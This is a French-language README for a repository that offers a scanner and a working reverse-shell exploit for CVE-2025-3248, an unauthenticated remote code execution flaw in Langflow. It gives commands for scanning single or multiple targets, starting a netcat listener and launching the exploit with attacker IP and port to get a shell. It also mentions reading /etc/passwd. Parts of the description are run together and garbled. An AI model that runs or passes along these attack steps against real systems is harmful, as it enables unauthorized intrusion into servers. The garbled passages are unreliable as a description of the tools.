
Ce dépôt contient deux scripts Python :
LangflowCheck.py : un scanner qui vérifie les instances Langflow AI vulnérables à la CVE-2025-3248.exploit.py : un exploit de shell inversé fonctionnel pour les cibles Langflow vulnérables.CVE-2025-3248 est une vulnérabilité critique dans Langflow AI qui permet à des attaquants non authentifiés d'exécuter du code Python arbitraire à distance via une charge utile spécialement conçue envoyée à /api/v1/validate/code.
LangflowCheck.py/etc/passwd.exploit.pylhost) et le port d'écoute (lport).exploit.log.pip install -r requirements.txt
URL unique
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

Cibles multiples
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

D'abord, démarrez un listener
sudo nc -nvlp 4444

Ensuite, exécutez l'exploit :
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

Vous devriez recevoir un shell si la cible est vulnérable.

Cet exploit est destiné uniquement à des tests de sécurité éducatifs et autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.